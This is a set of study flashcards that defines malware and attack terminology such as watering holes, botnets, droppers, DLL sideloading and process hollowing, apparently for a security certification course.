CH03 Maware Infections Flashcards

1
Q

What is a threat vector ?

A

method used by an attacker to access a victim’s machine. How the attacker get to the machine itself

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

What is Attack Vector?

A

method used by an attacker to gain access to an victim’s machine in order to infect it with malware. It includes both the way attacker got to the machine and how they are going to infect it

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What is Watering hole?

A

Malware is placed on a website that you know your potential victims will access

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

What is Typosquatting ?

A

url with very similar address as the real one. Ex: amazon.com vs. amazonS.com

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

What is a zombie ?

A

victimized computer whose control is under the attacker

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

What is Botnet

A

A collection of compromised computers under the control of a master node

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

What is Command and Control (C2)

A

node that controls hundreds of other computer that are part of their botnet

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

What is Active Interception ?

A

Occurs when a computer is placed between the sender and receiver and is able to capture or modify the traffic between them. Someone sending out false wifi network pretending to be public hotspot.. and all my network traffic goes through the attacker’s computer. He can capture whatever I am doing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

What is Privilege Escalation ?

A

Occurs when you are able to exploit a design flaw or bug in a system to gain access to resources that a normal user isn’t able to access. You are gaining access to a system as another user and finding ways to escalate their privilege to an admin role.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

What are Backdoors ?

A

Backdoors are used to bypass normal security and authentication functions. Remote Access Trojan (RAT) acts like a backdoor by granting attacker a persistent access

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

What is an Ester Egg ?

A

Non-malicious code that when invoked, displays an insider joke, hidden message, or secret feature

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

What is Logic Bomb ?

A

malicious code that has been inserted inside a program and will execute only when certain conditions have been met.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

What is dropper and downloader?

A

one of the exploitation techniques used by APT (Advanced Persistent Threat).

running lightweight shell code on your system which will download the rest of the code

Dropper - Malware designed to install or run other types of malware embedded in a payload on an infected host. They are usually a stage one dropper, it’s that cod you first get. And once you get that code and run it, it then goes out to get some other code using its own downloader

Downloader - a piece of code that connects to the internet to retrieve additional tools after the initial infection happens by a dropper.

Droppers are likely to implement anti-forensics techniques to prevent detection and analysis…. Such as encrypting their payloads, or compressing their payloads, or obfuscating their payloads, which makes reverse engineering a lot harder

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

What is Code Injection ?

A

Exploit technique that runs malicious code with the identification number of a legitimate process

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

What is Masquerading ?

A

dropper replaces a genuine executable with a malicious one

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

What is DLL injection ?

A

dropper starts forcing a process to load as part of the DLL.

17
Q

What is DLL sideloading

A

dropper is going to exploit a vulnerability in a legitimate program’s manifest to load malicious DLL at runtime

18
Q

What is Process hollowing ?

A

dropper starts a process in a suspended state and then rewrites the memory locations containing the process code with the malware code. We’re taking over some place in memory and putting our malicious code in there

19
Q

What is Living off the Land ?

A

exploit techniques that use standard system tools and packages to perform intrusions.

very difficult to find them.

For example, they might use something like a PowerShell to do malicious activities. Detection of an adversary is more difficult when they are executing malware code within standard tools and processes (living off the land).